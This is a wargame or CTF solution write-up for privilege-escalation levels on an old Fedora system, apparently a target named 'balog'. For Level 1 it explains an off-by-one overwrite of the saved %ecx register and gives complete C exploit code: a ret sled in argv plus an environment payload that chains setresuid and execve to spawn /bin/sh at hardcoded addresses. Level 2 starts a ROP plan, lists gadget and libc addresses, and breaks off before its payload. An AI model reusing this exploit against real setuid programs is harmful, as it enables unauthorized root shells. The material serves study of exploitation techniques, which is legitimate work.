Solutions
Level 1
- Off-by-one overflow of the saved %ecx register
  - First, the environment: Fedora 5. The function prologue and epilogue are changed to go through the %ecx register, which works as a stack guard and stack shield.
  - Normally we can't control the return address directly; to control it we need to control %ecx (ret+4), but guessing the value of %ecx is extremely difficult because of ASLR.
  - So we use an off-by-one attack that changes only one byte of the saved %ecx to 0x00.
- How to attack
  1. Insert 0x00 into the saved %ecx, so there is a high probability that the stack frame goes down (into the local variable).
  2. RET sled!
  3. In the last 4 bytes of the buffer, insert the address of main's epilogue to go back up the stack frame.
  4. Through the ret sled the epilogue runs and the stack pointer keeps increasing; it then points at an env value, so we check which env entry is pointed to.
  - cf) if the program uses a 256-byte array, %ecx points at the 27th env entry.
- Addresses
  - setresuid address : 0x001d3660
  - pppr address : 0x080484f6
  - null byte address : 0x8049704
  - execve address : 0x001d27e0
  - /bin/sh address : 0x00272db5
  - ret address : 0x0804848f
  - main's epilogue address : 0x08048484
- Payload : ret sled ...... | epilogue -> env : ..... setresuid pppr arg1 arg2 arg3 execve dummy arg1 arg2 arg3 ....
#include <unistd.h>

int main()
{
    /* env layout (adjacent string literals concatenate; an empty "" entry
       contributes a single NUL byte, which completes each 4-byte value) */
    char *env[] = {
        "1","2","3","4","5","6","7","8","9","10",
        "11","12","13","14","15","16","17","18","19","20",
        "21","22","23","24","25",
        "\x60\x36\x1d",                        /* setresuid */
        "\xf6\x84\x04\x08" "\xf5\x01", "\x00", /* pppr, arg1 */
        "\xf5\x01", "\x00",                    /* arg2 */
        "\xf5\x01", "\x00",                    /* arg3 */
        "\xe0\x27\x1d",                        /* execve */
        "AAAA" "\xb5\x2d\x27",                 /* dummy, arg1 (/bin/sh) */
        "\x04\x97\x04\x08" "\x04\x97\x04\x08", /* arg2, arg3 (null byte address) */
        "30","31","32","33",
        0
    };

    /* argv[1]: 63 x ret address (ret sled) followed by main's epilogue address = 256 bytes */
    char *argv[] = {
        "./balog",
        "\x8f\x84\x04\x08\x8f\x84\x04\x08\x8f\x84\x04\x08\x8f\x84\x04\x08"
        "\x8f\x84\x04\x08\x8f\x84\x04\x08\x8f\x84\x04\x08\x8f\x84\x04\x08"
        "\x8f\x84\x04\x08\x8f\x84\x04\x08\x8f\x84\x04\x08\x8f\x84\x04\x08"
        "\x8f\x84\x04\x08\x8f\x84\x04\x08\x8f\x84\x04\x08\x8f\x84\x04\x08"
        "\x8f\x84\x04\x08\x8f\x84\x04\x08\x8f\x84\x04\x08\x8f\x84\x04\x08"
        "\x8f\x84\x04\x08\x8f\x84\x04\x08\x8f\x84\x04\x08\x8f\x84\x04\x08"
        "\x8f\x84\x04\x08\x8f\x84\x04\x08\x8f\x84\x04\x08\x8f\x84\x04\x08"
        "\x8f\x84\x04\x08\x8f\x84\x04\x08\x8f\x84\x04\x08\x8f\x84\x04\x08"
        "\x8f\x84\x04\x08\x8f\x84\x04\x08\x8f\x84\x04\x08\x8f\x84\x04\x08"
        "\x8f\x84\x04\x08\x8f\x84\x04\x08\x8f\x84\x04\x08\x8f\x84\x04\x08"
        "\x8f\x84\x04\x08\x8f\x84\x04\x08\x8f\x84\x04\x08\x8f\x84\x04\x08"
        "\x8f\x84\x04\x08\x8f\x84\x04\x08\x8f\x84\x04\x08\x8f\x84\x04\x08"
        "\x8f\x84\x04\x08\x8f\x84\x04\x08\x8f\x84\x04\x08\x8f\x84\x04\x08"
        "\x8f\x84\x04\x08\x8f\x84\x04\x08\x8f\x84\x04\x08\x8f\x84\x04\x08"
        "\x8f\x84\x04\x08\x8f\x84\x04\x08\x8f\x84\x04\x08\x8f\x84\x04\x08"
        "\x8f\x84\x04\x08\x8f\x84\x04\x08\x8f\x84\x04\x08"
        "\x84\x84\x04\x08",                    /* main's epilogue */
        0
    };

    execve("./balog", argv, env);
    return 0;
}

reference : https://www.exploit-db.com/papers/13098/
Level 2
- Using ROP
  - The buffer size is only 4 bytes, and env and argv[1] are reset, so we can't use the off-by-one attack.
  - ASLR and Exec-Shield are also on, so we use ROP (Return Oriented Programming).
- Addresses
  - setreuid address : 0x0020ef00
  - geteuid address : 0x001d3220
  - /bin/sh's each character's address :
  - execl address : 0x001d2ac0
  - execve address : 0x001d27e0
  - strcpy@plt : 0x80483ec
  - pppr address : 0x08048666
  - ppr address : 0x080484a3
  - __gnome_start_
- Payload :